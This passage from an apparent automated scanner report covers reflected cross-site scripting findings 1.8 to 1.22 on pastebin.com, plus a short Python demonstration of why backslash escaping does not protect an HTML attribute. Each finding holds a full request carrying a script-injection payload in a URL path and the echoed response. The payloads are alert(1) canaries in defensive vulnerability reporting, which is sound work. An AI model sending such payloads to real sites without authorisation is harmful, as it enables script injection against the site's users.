GET /etc/adsca1b0"><script>alert(1)</script>e6b4ca5c2bf/iframes/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/adsca1b0\"><script>alert(1)</script>e6b4ca5c2bf/iframes/160x600.html"/>
...[SNIP]...
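
Why the \" in the echoed response is not a fix. Every pastebin finding in this report shows the same shape: the request path is placed into the double-quoted content attribute of the og:url meta tag on the 404 page, and the only transformation applied to it is a backslash in front of the quote. That is string-literal escaping (addslashes/magic-quotes style); an HTML tokenizer gives a backslash no meaning, so the quote still terminates the attribute and the > still closes the tag. The block below is an added example, not code from the report or from pastebin.com: it reproduces that escaping in Python as an assumption about what produced the \" (the server-side code is not on this page), renders the meta tag the way the response above does, and runs both the backslash-escaped and the entity-encoded version through Python's HTML tokenizer to show which one yields a script element.

```python
import html
from html.parser import HTMLParser

# Constructed from finding 1.8: the scanner's canary appended to the second
# path segment of /etc/ads/iframes/160x600.html.
CANARY = 'ca1b0"><script>alert(1)</script>e6b4ca5c2bf'
PROBE_PATH = '/etc/ads' + CANARY + '/iframes/160x600.html'


def backslash_escape(value: str) -> str:
    """Assumed reproduction of the escaping the response shows (" becomes \\").

    This protects a value inside a PHP or SQL string literal, not inside
    HTML markup: a browser does not treat a backslash as an escape.
    """
    return value.replace('\\', '\\\\').replace('"', '\\"')


def html_attribute_escape(value: str) -> str:
    """Entity-encodes the characters that can terminate a quoted attribute
    (the equivalent of htmlspecialchars($s, ENT_QUOTES) in PHP)."""
    return html.escape(value, quote=True)


def render_og_url(path: str, escape) -> str:
    """Builds the og:url meta tag the way the 404 page in the report does:
    the request path inside a double-quoted attribute."""
    return f'<meta property="og:url" content="http://pastebin.com{escape(path)}"/>'


class _TagCollector(HTMLParser):
    """Records every start tag and the meta tag's content attribute, so we
    can see what a browser-like tokenizer makes of the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.meta_content = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == 'meta':
            self.meta_content = dict(attrs).get('content')


def tokenize(markup: str):
    """Returns (list of start tags in document order, og:url attribute value)."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.meta_content


def script_tag_count(markup: str) -> int:
    """Number of <script> start tags the tokenizer sees; anything above 0
    means the attribute was broken out of."""
    return tokenize(markup)[0].count('script')


if __name__ == '__main__':
    for name, escape in (('backslash', backslash_escape),
                         ('html-attr', html_attribute_escape)):
        markup = render_og_url(PROBE_PATH, escape)
        tags, content = tokenize(markup)
        print(f'{name:10s} tags={tags} script_tags={tags.count("script")}')
        print(f'{"":10s} og:url attribute = {content!r}')
```

With the backslash version the tokenizer sees a meta tag whose attribute ends at ca1b0\ followed by a separate script element, exactly the structure a browser would build from the response above; with entity encoding it sees one meta tag whose attribute round-trips to the full path. The output-encoding fix belongs at the point the attribute is written, and a 404 handler has no reason to copy an unmatched request path into og:url at all.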

1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88792"><script>alert(1)</script>442cfd43152 was submitted in the REST URL parameter 3. This input was echoed as 88792\"><script>alert(1)</script>442cfd43152 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframes88792"><script>alert(1)</script>442cfd43152/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=21; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframes88792\"><script>alert(1)</script>442cfd43152/160x600.html"/>
...[SNIP]...

1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448e"><script>alert(1)</script>4efdc9546fc was submitted in the REST URL parameter 4. This input was echoed as 5448e\"><script>alert(1)</script>4efdc9546fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframes/160x600.html5448e"><script>alert(1)</script>4efdc9546fc HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=23; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframes/160x600.html5448e\"><script>alert(1)</script>4efdc9546fc"/>
...[SNIP]...

1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2ff"><script>alert(1)</script>c79d6fd4ca4 was submitted in the REST URL parameter 1. This input was echoed as ab2ff\"><script>alert(1)</script>c79d6fd4ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etcab2ff"><script>alert(1)</script>c79d6fd4ca4/ads/iframes/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etcab2ff\"><script>alert(1)</script>c79d6fd4ca4/ads/iframes/728x90.html"/>
...[SNIP]...

1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeee0"><script>alert(1)</script>1adcfa6439a was submitted in the REST URL parameter 2. This input was echoed as eeee0\"><script>alert(1)</script>1adcfa6439a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/adseeee0"><script>alert(1)</script>1adcfa6439a/iframes/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/adseeee0\"><script>alert(1)</script>1adcfa6439a/iframes/728x90.html"/>
...[SNIP]...

1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c601a"><script>alert(1)</script>f7bf1eddb58 was submitted in the REST URL parameter 3. This input was echoed as c601a\"><script>alert(1)</script>f7bf1eddb58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframesc601a"><script>alert(1)</script>f7bf1eddb58/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=21; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframesc601a\"><script>alert(1)</script>f7bf1eddb58/728x90.html"/>
...[SNIP]...

1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1424"><script>alert(1)</script>aa0b6363e32 was submitted in the REST URL parameter 4. This input was echoed as a1424\"><script>alert(1)</script>aa0b6363e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/ads/iframes/728x90.htmla1424"><script>alert(1)</script>aa0b6363e32 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=24; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/ads/iframes/728x90.htmla1424\"><script>alert(1)</script>aa0b6363e32"/>
...[SNIP]...

1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6c5"><script>alert(1)</script>0582bb56850 was submitted in the REST URL parameter 1. This input was echoed as 9b6c5\"><script>alert(1)</script>0582bb56850 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc9b6c5"><script>alert(1)</script>0582bb56850/social/index.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=15; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc9b6c5\"><script>alert(1)</script>0582bb56850/social/index.html"/>
...[SNIP]...

1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4fe"><script>alert(1)</script>732c7f33cfd was submitted in the REST URL parameter 2. This input was echoed as 7f4fe\"><script>alert(1)</script>732c7f33cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/social7f4fe"><script>alert(1)</script>732c7f33cfd/index.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/social7f4fe\"><script>alert(1)</script>732c7f33cfd/index.html"/>
...[SNIP]...

1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faf56"><script>alert(1)</script>0f8d2babee7 was submitted in the REST URL parameter 3. This input was echoed as faf56\"><script>alert(1)</script>0f8d2babee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etc/social/index.htmlfaf56"><script>alert(1)</script>0f8d2babee7 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etc/social/index.htmlfaf56\"><script>alert(1)</script>0f8d2babee7"/>
...[SNIP]...

1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7dc"><script>alert(1)</script>bda8880cef7 was submitted in the REST URL parameter 1. This input was echoed as cc7dc\"><script>alert(1)</script>bda8880cef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocc7dc"><script>alert(1)</script>bda8880cef7 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1; __utma=47852966.871251161.1315350535.1315350535.1315350535.1; __utmb=47852966.1.10.1315350535; __utmc=47852966; __utmz=47852966.1315350535.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php; __qca=P0-143015204-1315350538245

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:11:06 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=13; expires=Tue, 04-Oct-2011 18:11:06 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/favicon.icocc7dc\"><script>alert(1)</script>bda8880cef7"/>
...[SNIP]...

1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ddd"><script>alert(1)</script>cf73614236c was submitted in the REST URL parameter 1. This input was echoed as d3ddd\"><script>alert(1)</script>cf73614236c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /id3ddd"><script>alert(1)</script>cf73614236c/fixed.css?1 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/id3ddd\"><script>alert(1)</script>cf73614236c/fixed.css?1"/>
...[SNIP]...

1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864d"><script>alert(1)</script>7c325f7bd4e was submitted in the REST URL parameter 2. This input was echoed as 4864d\"><script>alert(1)</script>7c325f7bd4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/fixed.css4864d"><script>alert(1)</script>7c325f7bd4e?1 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/fixed.css4864d\"><script>alert(1)</script>7c325f7bd4e?1"/>
...[SNIP]...

1.21. http://pastebin.com/i/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99db1"><script>alert(1)</script>5c32890a4a was submitted in the REST URL parameter 1. This input was echoed as 99db1\"><script>alert(1)</script>5c32890a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i99db1"><script>alert(1)</script>5c32890a4a/style.css?12 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=16; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i99db1\"><script>alert(1)</script>5c32890a4a/style.css?12"/>
...[SNIP]...

1.22. http://pastebin.com/i/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4cc"><script>alert(1)</script>b321a1af605 was submitted in the REST URL parameter 2. This input was echoed as ed4cc\"><script>alert(1)</script>b321a1af605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/style.cssed4cc"><script>alert(1)</script>b321a1af605?12 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=18; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
